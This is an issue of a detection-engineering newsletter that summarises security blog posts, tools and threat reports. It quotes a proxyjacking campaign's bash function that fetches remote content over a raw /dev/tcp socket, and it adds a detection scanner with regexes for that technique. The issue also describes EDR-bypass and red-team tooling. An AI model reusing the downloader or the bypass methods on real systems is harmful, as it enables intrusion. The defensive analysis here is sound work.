Detection Engineering Weekly #30 - Screw your data lakes, I'm all in on data lagoons
We have fruity & boozy drinks on our threat hunts
Welcome to Issue #30 of Detection Engineering Weekly!
This week’s recap:
💎 by Simone Kraus on using threat modeling for detection ideation
Anti-cheat cheaters found process mockingjaying first, but only to stick it to Valve?
Anton Chuvakin pushes back on data lake monoliths, and joins me on the Detection Engineering Data Lagoon™
Gary Katz on building blocks on detection metrics, Craig Wright takes over your Confluence and JIRA servers, and the single best post I’ve read on ISAPI module internals by Ron Bowes
Kaspersky burns Lazarus TTPs (after having a few laughs), CISA adds 8 more KEVs, Krebs on the Dropbox/Formspring/LinkedIn hacker, and Avast posts an Akira Ransomware decrypter
Plus SO much more!
🫵 Hey you! Do you have a blog post, social link, or open-source tool you want to see in this newsletter?
Leave a comment below or email me techy@detectionengineering.net
💎 Detection Engineering Gem 💎
Holistic Threat Modeling by Simone Kraus
I am a big fan of threat modeling as an input to detection engineering. There are some things that threat modeling can do for a detection team: prioritize crown jewels, identify data sources, and choose to accept OR reject risk. Wouldn’t having this information before we start ideating on detections be nice?
Kraus calls this holistic threat modeling, where the teams involved focus on the threats, vulnerabilities, and exposure probabilities based on threat-informed defense. This is an excellent breakdown of their concept; I am using this as a reference from now on!
State of the Art
Some internal detection vectors bypass by namazso
For those who read Issue #29 of Detection Engineering Weekly last week, I linked a post about Process Mockingjaying techniques for bypassing EDRs. The TL;DR is that you can find vulnerable DLLs that have a default RWX section to place your “injected code” without switching the X bit on. After some Twitter chatter, a profile claimed to discover this technique in the anti-cheat space almost exactly 5 years ago.
Pretty brilliant post from namazso, and shows that security spreads across a ton of disciplines. Although this may be new to bypass EDRs, it was definitely not “new” to bypass anticheat programs.
Endpoint on Adrenaline : Part One by goblinloot
This was a great post by goblinloot on standing up a Security Subscription tenant in Azure/M365 with controls in place. I particularly liked how goblinloot focuses on cloud misconfigurations via CSPM, one of the four threat detection scenarios from the gem on Issue #25. Many features within Defender CSPM can help build out “known” and “unknown” lists of applications, which you can use later for threat detection.
Log Centralization: The End Is Nigh? by Anton Chuvakin
Are the days of a single monolithic sink for logs over, especially in a multi-cloud environment? According to Chuvakin, centralizing everything gets complicated when you have to adhere to compliance frameworks or control costs. Data lakes may be an answer to some of this, but as always, the answer is “it depends”, whether the dependency is your threat, budget, or compliance model.
Detection Engineering Metrics Building Blocks by Gary Katz
Great introduction on using basic statistics and machine learning applications for detection engineering. When discussing rule performance, I’ve seen that most people talk about true positives and false positives, but it turns out it’s more complicated than you think.
In statistics, there are no rewards or punishments, only consequences. So, depending on how you construct your rule and rule conditions, you may be trading off TPs for FPs, but you’ll increase overall TPs in a recall scenario. Please check this post out if you want a better idea of how this works in practice!
About False Positives in Detection Engineering by LockBoxx
Lots of discussion on the combination of statistics and detection engineering this week! LockBoxx describes the difference between the TP/FP/TN/FN phenomena of security alerts and how false positives are an essential indicator that something is working. LockBoxx also differentiates the burdens these alerts place on triage and detection teams; balancing triage while focusing on what matters (finding maliciousness) is the ideal state.
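To make the precision/recall trade-off from the Katz and LockBoxx posts concrete, here is an added example (not code from either post) that scores one rule at two thresholds against constructed, labelled alert data; the event scores, labels and helper names are assumptions.

```python
from dataclasses import dataclass

# Constructed sample: (score the rule computes for the event, analyst ground truth).
SAMPLE_EVENTS = [
    (0.95, True), (0.90, True), (0.85, False), (0.80, True), (0.75, True),
    (0.70, False), (0.65, False), (0.60, True), (0.55, False), (0.50, False),
    (0.40, False), (0.30, True), (0.20, False), (0.10, False), (0.05, False),
]


@dataclass(frozen=True)
class Confusion:
    tp: int  # rule fired, event was malicious
    fp: int  # rule fired, event was benign
    tn: int  # rule silent, event was benign
    fn: int  # rule silent, event was malicious (the misses recall measures)

    @property
    def precision(self) -> float:
        fired = self.tp + self.fp
        return self.tp / fired if fired else 0.0

    @property
    def recall(self) -> float:
        positives = self.tp + self.fn
        return self.tp / positives if positives else 0.0


def evaluate_rule(events, threshold):
    """Fire the rule on every event scoring >= threshold and count TP/FP/TN/FN."""
    tp = fp = tn = fn = 0
    for score, malicious in events:
        fired = score >= threshold
        if fired and malicious:
            tp += 1
        elif fired:
            fp += 1
        elif malicious:
            fn += 1
        else:
            tn += 1
    return Confusion(tp, fp, tn, fn)


def alerts_per_true_positive(c: Confusion) -> float:
    """Triage burden: how many alerts an analyst works through per real finding."""
    return (c.tp + c.fp) / c.tp if c.tp else float("inf")
```

Loosening the threshold from 0.8 to 0.5 on this sample raises recall from 0.50 to 0.83 but drops precision from 0.75 to 0.50 and doubles the alerts per true positive, which is exactly the trade-off both posts describe.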
How-to: Reversing and debugging ISAPI modules by Ron Bowes
Consider reading this blog post if you were on an incident involving the MOVEit vulnerability (CVE-2023-34362)! The vulnerability resided in an ISAPI module that MOVEit used to parse specific headers before sending them to the underlying application. ISAPI filters & modules are fascinating from an attacker perspective, and Bowes goes into great detail on how to reverse engineer (and hunt!) for ISAPI modules on a host.
Sowing Chaos and Reaping Rewards in Confluence and Jira by Craig Wright
Targeting company wikis is excellent tradecraft, according to red team member and Specter Ops employee Craig Wright. So, why not make it easier? AtlasReaper (linked below in the Open Source section) is a .NET application that can be used inside C2 frameworks to target Confluence and Jira servers. It’s a lightweight REST client that automates the recon of these internal Atlassian tools. It also has some cheeky post-exploitation actions to help make it easier to pivot through these environments.
SIEMplify alert tuning in Splunk by Donald Murchison
In this post, Murchison publishes their Tuning Framework for Splunk. We talk about tuning a lot in this newsletter, and I’ve seen many posts on efficacy, but it is mostly theoretical or framework-driven. It’s nice to see tools that you can instal
Detection Engineering on Social Media
Link: https://twitter.com/ellishlomo/status/1675725803521179648
Link: https://twitter.com/stvemillertime/status/1675231768310427651
Link: https://twitter.com/xnand_/status/1676336329985077249
Threat Landscape
Kaspersky crimeware report: Andariel’s mistakes and EasyRat malware by Kaspersky ICS CERT
Kaspersky burns a few TTPs by Andariel, an alleged subset of the Lazarus Group. Apparently, Andariel has a fat finger problem. After successful exploitation, the Kaspersky researchers laughed at a few misspellings of their human operator and an inability to adapt to a Portuguese locale on the victim's computer.
CISA Adds Eight Known Exploited Vulnerabilities to Catalog by CISA
D-Link (2) and Samsung Mobile (6) dominated the KEV list published by CISA last week. These are older vulnerabilities: the D-Link CVEs were seen exploited in a Mirai variant by Unit 42, but I couldn’t find much related to the Samsung phone exploits in my cursory research. Ravie Lakshmanan at The Hacker News postulated that these might be related to a Google Project Zero finding around the same time frame of the vulnerability releases.
The Trickbot/Conti Crypters: Where Are They Now? by Charlotte Hammond and Ole Villadsen
Trickbot & Conti never left - they just made new friends or are under a new moniker, according to Hammond and Villadsen at IBM Security. I love reading about Conti & Trickbot because:
They have been publicly attributed to mostly the same people.
They are super organized.
They’ve been “in the game” for going on over a decade at this point.
Allegedly, the groups disbanded after the “arrest” and dox of some members and reformed under different ransomware groups, droppers, loaders, and even stealers.
Russian Cybersecurity Executive Arrested for Alleged Role in 2012 Megahacks by Brian Krebs
It sounds like the alleged perpetrator of the Formspring, LinkedIn and Dropbox hacks 11 years ago was finally picked up by law enforcement. Nikita Kislitsin, the person named in the indictment, was picked up in Kazakhstan and used to be head of security at formerly Russian-based Group-IB. The best part? Kislitsin, according to Group-IB, now works for a Russian organization called “Fight Against Cybercrime Technologies.” You can’t make this up!
Decrypted: Akira Ransomware by Avast Threat Labs
The Akira ransomware gang, first reported on by Eric Capuano (and featured in this newsletter!), has similarities to Conti, according to Avast Threat Labs. The team at Avast also published a free decryptor for Akira infections. I was hoping they would get into how they broke the encryption, and if you read towards the end, it looks like it may be a weak password, and Avast brute-forced it with their tool.
Proxyjacking: The Latest Cybercriminal Side Hustle by Allen West
West and the Akamai Security Research team caught a proxyjacking campaign in their honeypots red-handed! This isn’t the first proxyjacking post on this newsletter, but there were a few notable findings in this post. First, the initial access script had a super-interesting “curl” (yes, in quotes) implementation. To me, it seems like the point was to be platform-independent.
function __curl() {
  # Split "proto://host:port/path" on "/" into three fields: proto, host:port, and the path words
  read proto server path <<<$(echo ${1//// })
  DOC=/${path// //}          # rejoin the path words with "/"
  HOST=${server//:*}         # strip ":port" to get the host
  PORT=${server//*:}         # strip "host:" to get the port
  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80   # no port given, so default to 80
  exec 3<>/dev/tcp/${HOST}/$PORT              # bash's built-in TCP socket; no curl binary needed
  echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\nUser-Agent: curl/6.1.9\r\n\r\n" >&3
  (while read line; do
    [[ "$line" == $'\r' ]] && break           # skip response headers up to the blank line
  done && cat) <&3                            # then dump the body to stdout
  exec 3>&-                                   # close the socket
}
Pretty neat, huh? Second, apparently proxyjackers, much like cryptominers, hate competitors. So, they find other proxyjacking Docker containers running on the victim host and kill them.
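As an added detection-side example (not code from the Akamai post), here is a small scanner that runs over constructed process-creation records and flags the two behaviours described above: the hand-rolled bash HTTP client (a /dev/tcp socket plus a fake curl User-Agent written by a shell) and the killing of other containers. The record fields, the sample command lines and the container names are assumptions.

```python
import re

# Constructed sample events (not real telemetry). "image" is the executable, "cmdline" its command line.
SAMPLE_EVENTS = [
    {"pid": 101, "image": "/bin/bash",
     "cmdline": "bash -c 'exec 3<>/dev/tcp/203.0.113.10/80; echo -en \"GET /s.sh HTTP/1.0\\r\\n"
                "User-Agent: curl/6.1.9\\r\\n\\r\\n\" >&3'"},
    {"pid": 102, "image": "/usr/bin/docker",
     "cmdline": "docker kill proxy_node_a proxy_node_b"},
    {"pid": 103, "image": "/usr/bin/curl",
     "cmdline": "curl -sSf https://repo.example.internal/pkg.tgz -o pkg.tgz"},
    {"pid": 104, "image": "/usr/bin/docker",
     "cmdline": "docker ps -a"},
]

# Each signal is a (name, regex) pair matched against the command line.
SIGNALS = [
    ("bash_devtcp_socket", re.compile(r"/dev/tcp/[\w.\-]+/\d+")),
    ("spoofed_curl_user_agent", re.compile(r"User-Agent:\s*curl/\S+")),
    # Noisy on its own; correlate with the socket signal or container metadata before alerting.
    ("docker_kill_container", re.compile(r"\bdocker\s+(kill|rm\s+-f|stop)\b")),
]


def scan_event(event):
    """Return the names of the signals that fire on a single event."""
    cmd = event["cmdline"]
    hits = []
    for name, pattern in SIGNALS:
        if not pattern.search(cmd):
            continue
        # A real curl binary sets its own User-Agent; the signal is a shell writing that header by hand.
        if name == "spoofed_curl_user_agent" and event["image"].endswith("/curl"):
            continue
        hits.append(name)
    return hits


def scan_events(events):
    """Map pid -> fired signals for every event that triggered at least one signal."""
    return {e["pid"]: hits for e in events if (hits := scan_event(e))}
```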
Open Source
threat-composer by awslabs
Take Kraus’ threat modeling post from above and use this to build “prescriptive threat articulation” statements. I quite like this because it takes the thinking out of some of the complexity in threat modeling and forces participants to describe statements in a standardized way.
ALFA by invictus-ir
Automated GCP forensic analyzer that converts Google events to MITRE ATT&CK and scores them based on a kill-chain timeline. The goal is to present the analyst with additional “sub-chains” to analyze and then build an incident timeline.
AtlasReaper by werdhaihai
Interesting red team tool (that I linked above in State of the Art) to help collect and further compromise victims on corporate Confluence and Jira servers. I’d be interested to see how some of these actions map to audit logs generated by Confluence servers.
TakeMyRDP by TheD1rkMtr
Interesting method to keylog RDP sessions. It uses SetWindowsHookEx to check for keyboard events and filters out everything but mstsc and CredentialUIBroker. I’m sure most EDRs can catch processes hooking keyboard events like this, but still interesting nonetheless!
edge by iknowjason
Edge is a cloud service provider IP attribution tool. Although it is mostly advertised as a red team/recon/bug bounty tool, it’s a great way to look up IP addresses and attribute them to specific cloud provider services.